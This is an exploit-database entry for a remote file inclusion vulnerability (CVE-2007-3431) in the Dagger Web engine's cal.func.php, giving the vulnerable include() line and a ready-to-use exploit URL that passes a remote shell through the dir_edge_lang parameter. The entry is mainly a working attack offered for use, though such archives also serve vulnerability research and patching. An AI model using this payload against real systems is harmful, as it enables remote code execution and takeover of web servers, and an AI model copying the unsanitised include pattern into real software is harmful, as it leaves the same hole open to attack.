EXPLOITS

dagger Web engine 23jan2007 - Remote File Inclusion

Author: Katatafish
type: webapps
platform: php
port: 
date_added: 2007-06-23  
date_updated:   
verified: 1  
codes: OSVDB-36302;CVE-2007-3431  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 4097.txt  

###Dagger-web engine(cal.func.php)Remote File Inclusion###

#download:
http://kent.dl.sourceforge.net/sourceforge/dagger/dagger_r23jan2007.
zip

#found by: katatafish (karatatata@hush.com)

#code:  (cal.func.php)
include($dir_edge_lang.'cal_lang.inc.php');

#exploit:
http://www.site.com/[path]/cal.func.php?dir_edge_lang=[SHELL]

#Thanks: str0ke

# milw0rm.com [2007-06-24]